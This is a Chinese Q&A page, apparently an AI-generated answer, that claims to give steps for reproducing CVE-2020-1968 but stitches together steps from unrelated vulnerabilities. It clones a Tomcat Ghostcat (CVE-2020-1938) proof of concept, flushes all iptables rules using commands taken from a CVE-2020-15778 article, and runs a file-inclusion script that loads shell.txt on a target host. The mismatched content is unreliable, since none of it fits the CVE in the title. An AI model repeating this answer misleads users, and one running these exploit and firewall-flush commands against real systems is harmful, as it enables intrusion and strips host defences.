CVE-2020-1968复现方法
时间: 2023-09-15 20:21:40 浏览: 177
复现CVE-2020-1968的方法如下:
1. 首先,克隆一个POC,可以使用以下命令克隆一个POC:
```
git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/
```
\[1\]
2. 按照教程中的指导,在目标机器上执行以下命令以清除所有策略并添加SSH端口禁用策略:
```
iptables -F
iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP
iptables -L -n --line-number
```
\[2\]
3. 访问shell.txt文件,使其发生文件包含。可以使用以下命令:
```
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/shell.txt 192.168.47.129
```
\[3\]
请注意,复现CVE-2020-1968存在一定的风险,应该在合法授权的环境中进行,并且仅用于研究和教育目的。
#### 引用[.reference_title]
- *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
- *2* [CVE-2020-15778 漏洞复现避坑指南](https://blog.csdn.net/weixin_45836195/article/details/125883140)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]
阅读全文